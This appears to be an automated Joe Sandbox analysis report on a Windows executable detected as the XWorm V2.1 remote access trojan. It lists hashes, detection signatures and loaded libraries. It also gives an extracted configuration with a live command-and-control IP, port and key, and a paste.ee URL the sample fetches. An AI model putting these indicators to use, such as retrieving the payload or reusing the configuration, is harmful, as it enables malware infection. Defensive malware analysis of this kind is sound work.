Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
E3XzKxHCCb.exe

Overview

General Information

Sample name:E3XzKxHCCb.exe
renamed because original name is a hash value
Original sample name:7f77b237f660c6ef5aa674dbe4d3b38f.exe
Analysis ID:1429287
MD5:7f77b237f660c6ef5aa674dbe4d3b38f
SHA1:5ab81981753086557187a7ae3fd4a3fb4e86b2a1
SHA256:b86c86fa3321ed97a4e5b0346dd482fcb910cbe8e996e46b125db3b5a58f790c
Tags:32exetrojanXWorm
Infos:

Detection

XWorm
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected XWorm
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
AV process strings found (often used to terminate AV products)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
PE file contains an invalid checksum
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • E3XzKxHCCb.exe (PID: 6756 cmdline: "C:\Users\user\Desktop\E3XzKxHCCb.exe" MD5: 7F77B237F660C6EF5AA674DBE4D3B38F)
    • WerFault.exe (PID: 6808 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6756 -s 1196 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"C2 url": ["67.213.221.11"], "Port": "2554", "Aes key": "2554", "Install file": "USB.exe", "Version": "XWorm V2.1"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1970824579.0000000000930000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    Process Memory Space: E3XzKxHCCb.exe PID: 6756JoeSecurity_XWormYara detected XWormJoe Security
      SourceRuleDescriptionAuthorStrings
      0.2.E3XzKxHCCb.exe.94d318.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
        0.2.E3XzKxHCCb.exe.94d318.1.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: E3XzKxHCCb.exeAvira: detected
          Source: 0.2.E3XzKxHCCb.exe.94d318.1.raw.unpackMalware Configuration Extractor: Xworm {"C2 url": ["67.213.221.11"], "Port": "2554", "Aes key": "2554", "Install file": "USB.exe", "Version": "XWorm V2.1"}
          Source: E3XzKxHCCb.exeReversingLabs: Detection: 23%
          Source: E3XzKxHCCb.exeVirustotal: Detection: 34%Perma Link
          Source: E3XzKxHCCb.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 172.67.187.200:443 -> 192.168.2.4:49730 version: TLS 1.2

          Networking

          barindex
          Source: Malware configuration extractorURLs: 67.213.221.11
          Source: unknownDNS query: name: paste.ee
          Source: Joe Sandbox ViewIP Address: 172.67.187.200 172.67.187.200
          Source: Joe Sandbox ViewIP Address: 172.67.187.200 172.67.187.200
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /r/tC4AK HTTP/1.1User-Agent: HimanenHost: paste.ee
          Source: unknownDNS traffic detected: queries for: paste.ee
          Source: E3XzKxHCCb.exe, 00000000.00000002.1970824579.0000000000930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://exmple.com/Uploader.php
          Source: Amcache.hve.3.drString found in binary or memory: http://upx.sf.net
          Source: E3XzKxHCCb.exe, 00000000.00000002.1970824579.0000000000977000.00000004.00000020.00020000.00000000.sdmp, E3XzKxHCCb.exe, 00000000.00000002.1970824579.00000000009A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
          Source: E3XzKxHCCb.exe, 00000000.00000002.1970824579.0000000000977000.00000004.00000020.00020000.00000000.sdmp, E3XzKxHCCb.exe, 00000000.00000002.1970824579.00000000009A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
          Source: E3XzKxHCCb.exe, 00000000.00000002.1970824579.0000000000977000.00000004.00000020.00020000.00000000.sdmp, E3XzKxHCCb.exe, 00000000.00000002.1970824579.00000000009A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
          Source: E3XzKxHCCb.exe, 00000000.00000002.1970824579.0000000000977000.00000004.00000020.00020000.00000000.sdmp, E3XzKxHCCb.exe, 00000000.00000002.1970824579.00000000009A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
          Source: E3XzKxHCCb.exe, 00000000.00000002.1970824579.0000000000977000.00000004.00000020.00020000.00000000.sdmp, E3XzKxHCCb.exe, 00000000.00000002.1970824579.00000000009A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
          Source: E3XzKxHCCb.exe, 00000000.00000002.1970824579.0000000000977000.00000004.00000020.00020000.00000000.sdmp, E3XzKxHCCb.exe, 00000000.00000002.1970824579.00000000009A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
          Source: E3XzKxHCCb.exe, 00000000.00000002.1970824579.0000000000977000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/
          Source: E3XzKxHCCb.exe, 00000000.00000002.1970824579.0000000000930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/r/tC4AK
          Source: E3XzKxHCCb.exe, 00000000.00000002.1970824579.0000000000930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/r/tC4AKD_
          Source: E3XzKxHCCb.exe, 00000000.00000002.1970824579.0000000000930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/r/tC4AKp
          Source: E3XzKxHCCb.exe, 00000000.00000002.1970824579.0000000000977000.00000004.00000020.00020000.00000000.sdmp, E3XzKxHCCb.exe, 00000000.00000002.1970824579.00000000009A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
          Source: E3XzKxHCCb.exe, 00000000.00000002.1970824579.0000000000977000.00000004.00000020.00020000.00000000.sdmp, E3XzKxHCCb.exe, 00000000.00000002.1970824579.00000000009A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
          Source: E3XzKxHCCb.exe, 00000000.00000002.1970824579.0000000000977000.00000004.00000020.00020000.00000000.sdmp, E3XzKxHCCb.exe, 00000000.00000002.1970824579.00000000009A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: E3XzKxHCCb.exe, 00000000.00000002.1970824579.0000000000977000.00000004.00000020.00020000.00000000.sdmp, E3XzKxHCCb.exe, 00000000.00000002.1970824579.00000000009A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
          Source: E3XzKxHCCb.exe, 00000000.00000002.1970824579.0000000000977000.00000004.00000020.00020000.00000000.sdmp, E3XzKxHCCb.exe, 00000000.00000002.1970824579.00000000009A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownHTTPS traffic detected: 172.67.187.200:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6756 -s 1196
          Source: E3XzKxHCCb.exe, 00000000.00000000.1708874802.0000000000709000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBas.exePADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD vs E3XzKxHCCb.exe
          Source: E3XzKxHCCb.exe, 00000000.00000002.1970824579.0000000000930000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameServicePack.exe4 vs E3XzKxHCCb.exe
          Source: E3XzKxHCCb.exeBinary or memory string: OriginalFilenameBas.exePADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD vs E3XzKxHCCb.exe
          Source: E3XzKxHCCb.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 0.2.E3XzKxHCCb.exe.94d318.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.E3XzKxHCCb.exe.94d318.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
          Source: classification engineClassification label: mal84.troj.evad.winEXE@2/6@1/1
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeMutant created: NULL
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6756
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeFile created: C:\Users\user\AppData\Local\Temp\~DF119D786586100221.TMPJump to behavior
          Source: E3XzKxHCCb.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: E3XzKxHCCb.exeReversingLabs: Detection: 23%
          Source: E3XzKxHCCb.exeVirustotal: Detection: 34%
          Source: unknownProcess created: C:\Users\user\Desktop\E3XzKxHCCb.exe "C:\Users\user\Desktop\E3XzKxHCCb.exe"
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6756 -s 1196
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: msvbvm60.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: vb6zz.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: asycfilt.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: E3XzKxHCCb.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: E3XzKxHCCb.exeStatic file information: File size 3162112 > 1048576
          Source: E3XzKxHCCb.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x26a000

          Data Obfuscation

          barindex
          Source: 0.2.E3XzKxHCCb.exe.94d318.1.raw.unpack, Helper.cs.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
          Source: E3XzKxHCCb.exeStatic PE information: real checksum: 0x3095ab should be: 0x313a04
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeCode function: 0_2_004058FA push ds; ret 0_2_00405902
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeCode function: 0_2_004038AC push ds; iretd 0_2_00403902
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeCode function: 0_2_00403DD1 push ds; iretd 0_2_00403DD2
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeCode function: 0_2_004079EA push ds; retf 0_2_00407A46
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeCode function: 0_2_00409A1E push ds; iretd 0_2_00409A2F
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeCode function: 0_2_00406F17 push dword ptr [ebp+7Ch]; ret 0_2_00406F1A
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeCode function: 0_2_00407B20 push ds; ret 0_2_00407B2A
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\E3XzKxHCCb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: Amcache.hve.3.drBinary or memory string: VMware
          Source: Amcache.hve.3.drBinary or memory string: VMware Virtual USB Mouse
          Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin
          Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.
          Source: Amcache.hve.3.drBinary or memory string: VMware20,1hbin@
          Source: Amcache.hve.3.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
          Source: Amcache.hve.3.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.3.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
          Source: E3XzKxHCCb.exe, 00000000.00000002.1970824579.0000000000992000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: Amcache.hve.3.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.3.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
          Source: Amcache.hve.3.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.3.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.3.drBinary or memory string: vmci.sys
          Source: Amcache.hve.3.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
          Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin`
          Source: Amcache.hve.3.drBinary or memory string: \driver\vmci,\driver\pci
          Source: Amcache.hve.3.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
